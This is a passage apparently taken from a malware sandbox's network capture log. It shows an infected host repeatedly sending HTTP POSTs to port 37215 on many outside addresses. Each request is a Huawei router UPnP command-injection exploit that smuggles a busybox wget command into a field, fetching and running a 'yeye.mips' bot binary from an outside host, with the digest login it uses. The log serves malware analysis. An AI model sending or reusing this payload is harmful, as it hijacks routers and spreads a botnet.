6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          573192.168.2.1545872197.98.57.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596942902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          574192.168.2.1540946184.201.83.12737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596971035 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          575192.168.2.1553220177.120.4.24137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.596993923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          576192.168.2.153570641.238.80.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597004890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          577192.168.2.1534400186.74.126.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597018957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          578192.168.2.1540842147.207.45.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597039938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          579192.168.2.153932641.105.3.2437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597062111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          580192.168.2.1560250197.27.6.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597073078 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          581192.168.2.1553060205.240.156.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597238064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          582192.168.2.1546914157.196.229.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597258091 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          583192.168.2.1537536213.62.130.16137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597269058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
